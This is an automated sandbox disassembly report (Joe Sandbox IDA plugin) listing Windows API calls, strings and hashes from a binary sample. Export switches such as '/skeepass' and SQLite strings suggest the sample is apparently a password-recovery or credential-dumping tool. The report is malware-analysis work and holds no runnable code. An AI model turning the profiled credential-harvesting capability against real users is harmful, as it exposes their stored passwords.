                                                                    • API String ID: 1043902810-0
                                                                    • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                    • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                    • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                    • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                    APIs
                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                    • memset.MSVCRT ref: 004085CF
                                                                    • memset.MSVCRT ref: 004085F1
                                                                    • memset.MSVCRT ref: 00408606
                                                                    • strcmp.MSVCRT ref: 00408645
                                                                    • _mbscpy.MSVCRT ref: 004086DB
                                                                    • _mbscpy.MSVCRT ref: 004086FA
                                                                    • memset.MSVCRT ref: 0040870E
                                                                    • strcmp.MSVCRT ref: 0040876B
                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040879D
                                                                    • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                    • String ID: ---
                                                                    • API String ID: 3437578500-2854292027
                                                                    • Opcode ID: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                                                    • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                    • Opcode Fuzzy Hash: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                                                    • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: _wcsicmp
                                                                    • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                    • API String ID: 2081463915-1959339147
                                                                    • Opcode ID: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                                                    • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                    • Opcode Fuzzy Hash: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                                                    • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                    APIs
                                                                    • GetDC.USER32(00000000), ref: 004121FF
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                    • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                    • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                    • SelectObject.GDI32(?,?), ref: 00412251
                                                                    • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                    • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                      • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                      • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                      • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                    • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                    • SetCursor.USER32(00000000), ref: 004122BC
                                                                    • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                    • memcpy.MSVCRT ref: 0041234D
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                    • String ID:
                                                                    • API String ID: 1700100422-0
                                                                    • Opcode ID: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                                                                    • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                    • Opcode Fuzzy Hash: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                                                                    • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                    APIs
                                                                    • GetClientRect.USER32(?,?), ref: 004111E0
                                                                    • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                    • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                    • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                    • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                    • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                    • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                    • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                    • String ID:
                                                                    • API String ID: 552707033-0
                                                                    • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                    • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                    • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                    • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                                      • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                      • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                      • Part of subcall function 0040BFF3: memcpy.MSVCRT ref: 0040C024
                                                                    • memcpy.MSVCRT ref: 0040C11B
                                                                    • strchr.MSVCRT ref: 0040C140
                                                                    • strchr.MSVCRT ref: 0040C151
                                                                    • _strlwr.MSVCRT ref: 0040C15F
                                                                    • memset.MSVCRT ref: 0040C17A
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                    • String ID: 4$h
                                                                    • API String ID: 4066021378-1856150674
                                                                    • Opcode ID: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                                                    • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                    • Opcode Fuzzy Hash: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                                                    • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: memset$_snwprintf
                                                                    • String ID: %%0.%df
                                                                    • API String ID: 3473751417-763548558
                                                                    • Opcode ID: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                                                    • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                    • Opcode Fuzzy Hash: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                                                    • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                    APIs
                                                                    • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                    • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                    • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                    • GetTickCount.KERNEL32 ref: 0040610B
                                                                    • GetParent.USER32(?), ref: 00406136
                                                                    • SendMessageW.USER32(00000000), ref: 0040613D
                                                                    • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                    • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                    • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                    • String ID: A
                                                                    • API String ID: 2892645895-3554254475
                                                                    • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                    • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                    • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                    • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                    • String ID: 0$6
                                                                    • API String ID: 4066108131-3849865405
                                                                    • Opcode ID: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                                    • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                    • Opcode Fuzzy Hash: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                                    • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                    APIs
                                                                    • memset.MSVCRT ref: 004082EF
                                                                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                    • memset.MSVCRT ref: 00408362
                                                                    • memset.MSVCRT ref: 00408377
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: memset$ByteCharMultiWide
                                                                    • String ID:
                                                                    • API String ID: 290601579-0
                                                                    • Opcode ID: aa14e1b9e389497361ed401ed70ebc10d5f62d7ff5e107018b9223dc9ab6e0fb
                                                                    • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                    • Opcode Fuzzy Hash: aa14e1b9e389497361ed401ed70ebc10d5f62d7ff5e107018b9223dc9ab6e0fb
                                                                    • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: memcpywcslen$_snwprintfmemset
                                                                    • String ID: %s (%s)$YV@
                                                                    • API String ID: 3979103747-598926743
                                                                    • Opcode ID: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                                                    • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                    • Opcode Fuzzy Hash: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                                                    • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                    APIs
                                                                    • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                                                    • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                    • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                                    • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: Library$AddressFreeLoadMessageProc
                                                                    • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                    • API String ID: 2780580303-317687271
                                                                    • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                    • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                    • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                    • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                    APIs
                                                                    • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000,?,00412758,00000000), ref: 0040A686
                                                                    • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669), ref: 0040A6A4
                                                                    • wcslen.MSVCRT ref: 0040A6B1
                                                                    • wcscpy.MSVCRT ref: 0040A6C1
                                                                    • LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000), ref: 0040A6CB
                                                                    • wcscpy.MSVCRT ref: 0040A6DB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                    • String ID: Unknown Error$netmsg.dll
                                                                    • API String ID: 2767993716-572158859
                                                                    • Opcode ID: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                                                    • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                    • Opcode Fuzzy Hash: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                                                    • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                    APIs
                                                                    Strings
                                                                    • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                    • too many attached databases - max %d, xrefs: 0042F64D
                                                                    • database %s is already in use, xrefs: 0042F6C5
                                                                    • unable to open database: %s, xrefs: 0042F84E
                                                                    • database is already attached, xrefs: 0042F721
                                                                    • out of memory, xrefs: 0042F865
                                                                    • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: memcpymemset
                                                                    • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                    • API String ID: 1297977491-2001300268
                                                                    • Opcode ID: b87818fa112a0acc8a66a9ae252063e0b2e26e7fac12933c278b7e571d5e68ae
                                                                    • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                    • Opcode Fuzzy Hash: b87818fa112a0acc8a66a9ae252063e0b2e26e7fac12933c278b7e571d5e68ae
                                                                    • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                    APIs
                                                                    • DeleteFileW.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                                    • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                    • GetLastError.KERNEL32 ref: 0041855C
                                                                    • Sleep.KERNEL32(00000064), ref: 00418571
                                                                    • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                                    • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                    • GetLastError.KERNEL32 ref: 0041858E
                                                                    • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 004185AC
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: File$AttributesDeleteErrorLastSleep$??3@
                                                                    • String ID:
                                                                    • API String ID: 3467550082-0
                                                                    • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                    • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                    • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                    • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                    • wcscpy.MSVCRT ref: 0040D1B5
                                                                      • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                      • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                    • wcslen.MSVCRT ref: 0040D1D3
                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                    • LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                    • memcpy.MSVCRT ref: 0040D24C
                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                    • String ID: strings
                                                                    • API String ID: 3166385802-3030018805
                                                                    • Opcode ID: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                                                    • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                    • Opcode Fuzzy Hash: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                                                    • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                    APIs
